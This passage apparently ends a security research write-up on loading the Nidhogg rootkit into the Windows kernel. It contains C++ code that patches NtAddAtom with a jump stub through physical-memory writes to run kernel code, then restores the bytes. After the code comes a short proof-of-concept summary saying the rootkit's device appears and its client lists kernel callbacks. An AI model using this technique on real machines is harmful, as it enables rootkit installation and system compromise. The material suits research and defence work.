    assert((unsigned char)modified_bytes[0] == 0x48 && (unsigned char)modified_bytes[1] == 0xb8 && (unsigned char)modified_bytes[10] == 0xff && (unsigned char)modified_bytes[11] == 0xe0);

    using FunctionFn = NTSTATUS(__stdcall*)(void);
    const auto Function = reinterpret_cast<FunctionFn>(NtAddAtom);

    NTSTATUS status = Function();

    WriteToPhysicalMemory(hDevice, pNtAddAtomPhysical, (char*)original_bytes, 12); // Restore original function

    return status;
}

Proof of Concept

Figure 7 - Proof of concept - Exploit result (part 1).

Figure 8 - Proof of concept - Exploit result (part 2).

With WinObj64, we can see that a new device Nidhogg appears in the devices list.

Figure 9 - List of the devices registered.

Finally, calling the NidhoggClient works fine. Here's an example to list the kernel callbacks.

Figure 10 - Nidhogg rootkit correctly callable after being reflectively loaded.
